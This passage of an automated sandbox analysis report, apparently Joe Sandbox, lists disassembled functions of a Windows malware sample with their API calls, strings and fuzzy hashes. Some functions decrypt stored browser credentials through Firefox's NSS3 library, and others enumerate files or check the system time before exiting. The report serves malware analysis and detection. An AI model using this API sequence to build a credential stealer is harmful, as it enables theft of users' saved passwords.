StrCmpCA.SHLWAPI(?,001A1470), ref: 0018DD04
FindNextFileA.KERNEL32(000000FF,?), ref: 0018E220
FindClose.KERNEL32(000000FF), ref: 0018E232

Strings

\*.*, xrefs: 0018DC66

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 37421294c9a6c26c5a6d9ebee754825a45c3f1a93aad1a62b109b0aff0b284b5
Instruction ID: 034431d24120ee1a362a4f4741ad6b76462e7d15fb60141d8fef10e7c9aba989
Opcode Fuzzy Hash: 37421294c9a6c26c5a6d9ebee754825a45c3f1a93aad1a62b109b0aff0b284b5
Instruction Fuzzy Hash: 74F16C71814118AACF19FB64DC95AEE7338BF65300F8041E9B51A620A1EF716B8DDFD2

Function 0018C660 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0018C6B1
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0018C6BC
PK11_GetInternalKeySlot.NSS3 ref: 0018C6CA
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0018C6E5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0018C72B
lstrcat.KERNEL32(?,001A0B2E), ref: 0018C783
lstrcat.KERNEL32(?,001A0B2F), ref: 0018C797
PK11_FreeSlot.NSS3(?), ref: 0018C7A1
lstrcat.KERNEL32(?,001A0B33), ref: 0018C7B8

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: f14cd97ce3b0837a921768aa13bde4279655f8c4dba740b3575d73c6d58c7b9d
Instruction ID: c0a839de22aa0950fad32fadb47375e4167ff07df4ed4768fb4cba392179b3dc
Opcode Fuzzy Hash: f14cd97ce3b0837a921768aa13bde4279655f8c4dba740b3575d73c6d58c7b9d
Instruction Fuzzy Hash: 60414F7990421ADFDB10DFA0DD89FFEB7B8BB49304F1041A8E609A7280D7745A84CFA1

Function 0053F989 Relevance: 12.9, Strings: 9, Instructions: 1604COMMON

Download Yara Rule

Strings

w6]u, xrefs: 005405D0
[xm, xrefs: 0053FF23
Q;, xrefs: 00540C01
r~w, xrefs: 0053FB08
oE]~, xrefs: 00540933
[xm, xrefs: 0053FFCF
NBwv, xrefs: 00540782
B)5, xrefs: 0053FED7
m, xrefs: 005405BF

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: NBwv$Q;$[xm$[xm$oE]~$r~w$w6]u$B)5$m
API String ID: 0-767094649
Opcode ID: a018f064cbad8268da590060aea9f398b6d7231ce106888a3b57da8e7b499ca3
Instruction ID: 6b3bd4b00cbd9075e3d2e1aa2219cdfdaa0d8bd25058a9a8d7f36e906130c363
Opcode Fuzzy Hash: a018f064cbad8268da590060aea9f398b6d7231ce106888a3b57da8e7b499ca3
Instruction Fuzzy Hash: 0CB229F3A0C2009FE708AE2DEC8567ABBE5EF94320F16493DEAC5C7344E97558018697

Function 6C6C2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6C2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6C2C61

Part of subcall function 6C674DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C674E5A
Part of subcall function 6C674DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C674E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6C2E2D

Part of subcall function 6C6881B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6881DE

Strings

expected a Time entry, xrefs: 6C6C2E36
(root), xrefs: 6C6C354F
ProfileBuffer parse error: %s, xrefs: 6C6C2E3B

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: ec4da0afed784223a6327250c1d654ded6e3d743f50d6bd9e1b7d056855011a0
Instruction ID: 323de6c47007a62474a713327a51e6afa3120c5b4383c78c46a2b93eaefca42a
Opcode Fuzzy Hash: ec4da0afed784223a6327250c1d654ded6e3d743f50d6bd9e1b7d056855011a0
Instruction Fuzzy Hash: 7F91BE706087418FC724CF25C48469EB7E1EFCA358F10492DE99A8B750DB30D949CB5B

Function 0053DF10 Relevance: 11.6, Strings: 8, Instructions: 1627COMMON

Download Yara Rule

Strings

(_=, xrefs: 0053E03A
l5B, xrefs: 0053F11F
4,^[, xrefs: 0053DF43
?V~, xrefs: 0053EA7F
g~, xrefs: 0053E811
<Y}, xrefs: 0053E707
s/s, xrefs: 0053F260
BAoF, xrefs: 0053E678

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: g~$(_=$4,^[$<Y}$?V~$BAoF$l5B$s/s
API String ID: 0-3092103552
Opcode ID: c8a76406ecd9a2f11e15246ce87a5d7b5b9590d0dab3ab93e3deb9b5ce02e737
Instruction ID: 5de06cf4197fb77f6513cc73078d7af39ef052c9cf2237d59bdb5dd9e8afd8e1
Opcode Fuzzy Hash: c8a76406ecd9a2f11e15246ce87a5d7b5b9590d0dab3ab93e3deb9b5ce02e737
Instruction Fuzzy Hash: 5FB2E8F3A0C6049FE304AE2DEC8567ABBE5EF94320F16893DE6C4C7744E63598058796

Function 6C67D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

0, xrefs: 6C67DC7F
, xrefs: 6C67DA88
@, xrefs: 6C67DAF6
9, xrefs: 6C67DE7F
0, xrefs: 6C67D852
-, xrefs: 6C67D7DD
1, xrefs: 6C67DBDD
8, xrefs: 6C67DC08

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: d9f5a783ac69c99476d0bd188282678eb3d0e20889cc8b405eb6f50c6cf1f6a9
Instruction ID: 512c6275944aba2dce9975039fb5f97430a8503be1e1e1f2693d34c58bf0309d
Opcode Fuzzy Hash: d9f5a783ac69c99476d0bd188282678eb3d0e20889cc8b405eb6f50c6cf1f6a9
Instruction Fuzzy Hash: F062BE7150C3458FE721CF29C09079EBBF2AF86358F184E0DE4E54BA91D3359885CBAA

Function 6C6E545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6E8A4B

Strings

~qgl, xrefs: 6C6E9459, 6C6E56C7, 6C6E5740, 6C6E5703, 6C6E921F, 6C6E9269, 6C6E948F

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset
String ID: ~qgl
API String ID: 2221118986-2435832519
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: ccd676033fa14efb58b84d1ecbe4bdd4162506bda8df82a94812d5ca6784a583
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: B2B10B72E0521ACFDB14CF68CC907D9B7B2EF89314F1902AAC549DB791E7309989CB94

Function 6C6E542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6E88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6E925C

Strings

~qgl, xrefs: 6C6E9459, 6C6E56C7, 6C6E5740, 6C6E5703, 6C6E921F, 6C6E9269, 6C6E948F

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset
String ID: ~qgl
API String ID: 2221118986-2435832519
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 179cccb7540f13821518fde36926f7931901db4a7b2938a7be728f08da44b098
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 43B1D772E0920ACFDB14CF58CC816DDB7B2EF89314F15026AC949DB795D730A989CB94

Function 005309EF Relevance: 9.1, Strings: 6, Instructions: 1570COMMON

Download Yara Rule

Strings

9p{m, xrefs: 00531A72
Yc , xrefs: 00531A9F
Hq, xrefs: 00531991
U]{W, xrefs: 0053124B
IU, xrefs: 00531CBF
B<s, xrefs: 00530D0B

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: Yc $9p{m$B<s$U]{W$Hq$IU
API String ID: 0-2530018767
Opcode ID: ac63babdceedc8be3a6ca488605bb38fb88f7d69f3b295d7dd0a5280e1ce8bc0
Instruction ID: a2709cb00e39766d150105fa0a4e1c1bd8d0f76a6fa85668cbba422c0c10d804
Opcode Fuzzy Hash: ac63babdceedc8be3a6ca488605bb38fb88f7d69f3b295d7dd0a5280e1ce8bc0
Instruction Fuzzy Hash: 9CA206F360C2049FE7046E2DEC8567AFBE9EF94320F1A493DEAC4C7744EA3558058696

Function 0053C3FA Relevance: 7.9, Strings: 5, Instructions: 1639COMMON

Download Yara Rule

Strings

`r{;, xrefs: 0053C6AA
\SOd, xrefs: 0053CFFA
~kKh, xrefs: 0053D396
9W, xrefs: 0053D679
`r{;, xrefs: 0053C748

Memory Dump Source

Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID: 9W$\SOd$`r{;$`r{;$~kKh
API String ID: 0-2303421948
Opcode ID: 6600fad681203d1d422c795ad4c206f4d10dc0d6845f4431c5771c77383238e9
Instruction ID: 73f5513e39cff75bb20fcdd891721cccbcee286a760ce2304e56c7d0bf9a827f
Opcode Fuzzy Hash: 6600fad681203d1d422c795ad4c206f4d10dc0d6845f4431c5771c77383238e9
Instruction Fuzzy Hash: BAB22BF360C2049FE704AE2DEC8567ABBE9EF94720F16493DEAC4C7744E63598058792

Function 001963C0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0019640C
sscanf.NTDLL ref: 00196439
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00196452
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00196460
ExitProcess.KERNEL32 ref: 0019647A

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
